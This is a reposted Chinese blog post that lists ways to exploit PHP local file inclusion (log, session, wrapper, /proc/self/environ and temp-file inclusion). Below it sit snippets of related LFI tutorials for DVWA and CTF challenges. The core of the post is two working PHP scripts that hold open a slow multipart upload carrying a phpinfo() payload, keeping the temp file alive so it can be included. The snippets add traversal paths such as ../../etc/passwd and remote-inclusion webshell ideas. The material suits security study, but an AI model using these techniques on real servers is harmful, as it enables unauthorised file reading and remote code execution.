php Local File Inclusion的利用方法汇总

最新推荐文章于 2024-11-27 19:00:14 发布
转载 最新推荐文章于 2024-11-27 19:00:14 发布 · 788 阅读 · 0
文章标签:

#php #file #wrapper #cmd #服务器 #session

本文探讨了PHP中多种文件包含的方式,包括上传文件、日志文件、使用phpwrapper及临时文件等,并提供了生成临时文件并使其留存的技术手段。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

看的国外的一个paper ,总结一下(截断统一不考虑):

1. 包含上传好的文件,jpg、txt、rar等允许的文件。

2. 包含各种日志。

3. 使用php wrapper,例如php://input、php://filter、data://等。

4. 包含 /proc/self/environ ,不熟悉linux,这个就靠大家了。

5. 包含SESSION文件,php保存格式 sess_SESSIONID  默认位置是/tmp/和c:/windows/temp/ 。

6. 包含由php程序生成的文件,缓存、模版等。

7. 包含tmp文件,格式举例:/tmp/phpUs7MxA 和 c:/windows/temp/php3e.tmp(win下可暴力猜解) 。

关于最后一种比较麻烦,也够鸡肋。大家不要想当然,认为tmp和move_uploaded_file()有关,其实没有move_uploaded_file()函数时,php会自动、马上清除tmp文件,而让它保留在服务器的方法是 慢连接 。

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

测试包含temp文件所用两脚本,这个方法唯一好处就是向任意php文件发包,php总会先在服务器上生成tmp文件,然后慢连接使它不被删除:

<?
/* 这个所用时间较少 , 会产生20个临时文件 */
set_time_limit(0);

$cmd = 'Content-Disposition: form-data; name="evil"; filename="evil.php"
Content-Type: zzz

<?phpinfo()?>
--k4shifz_boundary
';
$fs=fsockopen('localhost',80);

/* you can also use HTTP/1.1 */
fputs($fs,'POST /test.php HTTP/1.0
Content-Type: multipart/form-data; boundary=k4shifz_boundary
Host: localhost
Content-Length: 999999

--k4shifz_boundary
'.$cmd);
while($fs)
{
 fputs($fs,$cmd);
 sleep(1);
}
fclose($fs);
exit;
?>

<?
/* 所用时间较长,会产生1个临时文件 */
set_time_limit(0);
$fs=fsockopen('localhost',80);
fputs($fs,'POST /test.php HTTP/1.0
Content-Type: multipart/form-data; boundary=k4shifz_boundary
Host: localhost
Content-Length: 999999

--k4shifz_boundary
Content-Disposition: form-data; name="evil"; filename="evil.php"
Content-Type: zzz

<?phpinfo()?>
--k4shifz_boundary--
');

while($fs)
{
 fputs($fs,'AAAA');
 sleep(1);
}

fclose($fs);
exit;
?>

另外遗憾的说一句,php5.3.4中,null截断已经被修复,%00将告别舞台。


 

http://hi.baidu.com/kashifs/blog/item/7a4bbcff72cea90308244d2b.html

DVWA之PHP文件包含漏洞(File Inclusion
Mi1k7ea
03-08 1万+
文件包含漏洞,简单地说,就是在通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,就会导致文件信息的泄露甚至注入了恶意代码。更多的介绍这里就不多说了,直接上正题~ 文件包含漏洞的一般特征如下: ?page=a.php ?home=a.html ?file=content 目录遍历(Directory
PHP Local File Inclusion RCE with PHPINFO
weixin_38885346的博客
05-07 1162
该实验为Vulnhub上的一个漏洞环境,利用phpinfo与LFI(本地文件包含)漏洞,实现RCE。 这里用到了如下几个条件: 1.php的config配置文件里file_uploads=on则,php会接收post请求传输的文件,并临时存储在一个目录中,当该post请求处理结束后,服务端就会将该临时文件删除; 2.php需要一个LFI漏洞,方便我们去访问上传的恶意的临时文件,临时文件中写好了恶意的php脚本。 exp的实现思路: 1.以post的形式传输一个文件给phpinfo,同时在请求头中写入大量的垃
Wechall PHP - Local File Inclusion
weixin_44024162的博客
05-14 389
Wechall PHP - Local File Inclusion 本地文件包含(Local File Inclusion) 本地文件包含(LFI)类似于远程文件包含漏洞,但不包括远程文件,只能包括当前服务器上的本地文件(即执行中的文件)。此问题仍可以通过包含包含攻击者控制的数据(如 Web 服务器的访问日志)的文件来导致远程代码执行。 题目 wechall的LFI题 分析 题目要求为显示 …/solution.php 文件 相关代码: GeSHi`ed PHP code $filename =
WeChall_PHP-Local File Inclusion(LFI)
1stPeak's Blog
09-16 591
PHP - Local File Inclusion(LFI) 题目: 中文翻译如下: 核心代码: $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html'; include $filename; 代码详解: 当要 判断一个变量是否已经声明的时候 可以使用 isset 函数 判断表达式是否成立?表...
FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
cnbird's blog
09-30 1639
Security Advisory FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution Researcher Information Discovered by: Giuseppe `Zmax` Fuggiano Website: http://www.giusef.net Conta
Dvwa漏洞之 local file inclusion 本地文件包含
小雨的博客
04-10 3664
local file inclusion运行攻击者读取同一台服务器上的认可文件 访问www目录外的文件 如果用户账号密码保存在某个文件里,就可以读了,这个是很危险的 如果多个网站部署在一台服务器上,通过a网站的此漏洞,就可以访问B网站的文件,从而进一步实施攻击 ...
Remote & Local File Inclusion (RFI/LFI)-文件包含漏洞
seanyang_的博客
10-26 613
文件包含攻击,是指攻击者利用文件包含函数的参数引入文件,而Web应用又没有对该参数进行严格的过滤,导致引入文件中的恶意脚本或代码被解析、执行,攻击者获取服务器信息,甚至获取服务器权限。在PHP开发的Web应用中,脚本、图片、文本文档等被文件包含后,都会作为PHP脚本来解析。
pikachu Fileinclusion(local)
LIU6636LIU的博客
07-24 380
windows系统肯定有的文件是C:\Windows\win.ini,用这个来尝试有没有文件包含漏洞。结合报错信息中泄露的fi_local.php文件位置,可以算出相对路径为C:/../../../..发现文件名确实是file1.php~file5.php。/windows/win.ini,代入url。那么会不会还有别的burp抓包选中数字。678异常还有个100也是。但是通过这我们可以得到路径。发现url上数字会变。设置6-100的爆破。
Pickachu第六弹:File Inclusion(文件包含漏洞)
Pisces_mango的博客
09-03 640
目录 一、File Inclusionlocal) ​二、File Inclusion(remote) 一、File Inclusionlocal) 1.选择一个选项 2.在url中输入../../../../../../../etc/passwd可以读取文件 二、File Inclusion(remote) 可以搭恶意站点,在上面放一个恶意代码上,然后把路径从前端传到后台,后台包含函数会对远程的路径进行加载,可以对目标站点进行远程控制 1.创建恶意代码放在目录下 2.
php文件包含漏洞 file inclusion vulnerability
whyrookie的博客
09-19 594
0x00 何为文件包含漏洞 开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子: <? include $_GET['a'] ?> 此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了。 一个更具体的例子: 在访问一个页面时: 此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内容,此即为...
CTF-rootme 题解之Local File Inclusion - Double encoding
weixin_30478923的博客
03-21 713
LINK:https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Double-encoding    http://challenge01.root-me.org/web-serveur/ch45/ 本题考察的是本地文件包含漏洞和URL编码,而且是二次编码。 查看链接如下: http://challeng...
【DVWA】File Inclusion
qq_43665434的博客
03-01 276
【DVWA】File Inclusion 一、low级别 1、测试流程 (1)local 发现文件名是通过url传递的 于是尝试更改page参数内容 替换为:..\..\..\..\..\..\..\..\password.txt 如图所示,成功爆出根目录下password.txt文件下的内容,此为本地文件包含。 (2)remote 搭建一个站点,写入一个木马文件 将page参数内容替换为木马文件的url地址 加上参数x,传入cmd命令: http://10.245.3.237/dvwa/vulner
DVWA靶场——File Inclusion
最新发布
sucker的博客
11-27 2017
例如,常见的file://协议用于读取本地文件,而php://协议则是PHP特有的协议,用于访问PHP内部流或执行某些特定操作。:许多服务器会在 PHP 配置中禁用文件包含功能,或者启用了 open_basedir、safe_mode 等安全设置,限制了包含文件的路径和范围,从而减少了攻击者通过 LFI 漏洞访问系统文件的能力。经过前面的测试知道存在文件包含漏洞,那么还可以测试有无远程文件包含,思路就是通过远程文件包含从攻击者搭建的服务器下载恶意的木马文件,以获取该网站的webshell。
LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习
weixin_45116657的博客
02-04 3520
友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一、文件包含的基本概念 1、要想成功利用文件包含漏洞,需要满足下面的条件 (1)include()等函数通过动态变量的方式引入需要包含的文件 (2)用户能够控制该动态变量 二、LFI(Local File Include)本地文件包含 1、00字符截断 防御方法: ...
File Inclusion--文件包含漏洞
qq_17762247的博客
05-27 828
一、简介 为了提高代码的复用性,开发人员往往将业务功能封装成模块放入一个文件中,需要的时候包含对应的文件即可。如果包含者为对被包含的文件进行检查,那么很有可能造成灾难性的后果。 File Inclusion分为LFI(Local File Inclusion,本地文件包含)和RFI(Remote File Inclusion,远程文件包含),LFI指使用文件包含函数包含执行本地(Web应用所在主机)文件,利用LFI可以查看系统任意文件内容,如果具备一些条件,也可以执行命令;RFI需要一定的条件,以PHP应用
File Inclusion(文件包含漏洞)
今天的风儿甚是喧嚣
07-10 727
文件包含漏洞总结
网页文件包含漏洞(file inclusion)
热门推荐
正在成为 code ape
03-27 1万+
web php 文件包含漏洞是“代码注入“的一种。代码注入的原理就是注入一段用户能控制的脚本或代码,并让服务端执行 常见的导致文件包含的函数如下: PHP: include(), include_once(), require(),require_once, fopen(), readfile() …. JSP/Servlet: ava.io.File(),java.io.FileReader(...
网络攻击与防御之File Inclusion
薛定谔博客
01-15 428
参考网站: https://www.freebuf.com/articles/web/119150.html LOW 点击file1.php,显示如下 漏洞利用 本地文件包含 构造url http://localhost:8080/DVWA/vulnerabilities/fi/?page=/etc/shadow 报错,显示没有这个文件。 构造url(绝对路径) http://localhos...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值